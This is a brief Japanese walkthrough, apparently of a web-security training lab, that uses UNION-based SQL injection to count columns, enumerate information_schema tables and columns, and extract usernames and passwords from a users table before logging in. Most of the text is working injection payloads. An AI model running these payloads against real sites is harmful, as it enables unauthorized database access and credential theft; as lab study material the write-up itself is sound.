Hello there, ('ω')ノ
SQLインジェクション攻撃、Oracle以外のデータベースコンテンツを一覧表示を。
まずは、Petsをクリックして。
リクエストをリピータへ。
はじめにカラム数のチェックから。
xxx'+UNION+SELECT+NULL--
どうやら2つのカラムのようで。
xxx'+UNION+SELECT+NULL,NULL--
そして、どちらのカラムもテキストデータのようで。
レスポンスにも表示されて。
xxx'+UNION+SELECT+'abc','xyz'--
次にDB内のテーブルを表示して。
ユーザの資格情報らしきテーブルを探して。
xxx'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
下記のペイロードで、カラム名を表示させて。
xxx'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_xtnwpb'--
最後にユーザ名とパスワードをみつけて。
xxx'+UNION+SELECT+username_fsmhio,+password_tscvvc+FROM+users_xtnwpb--
取得したデータでログインして。
クリアできた。
Best regards, (^^ゞ
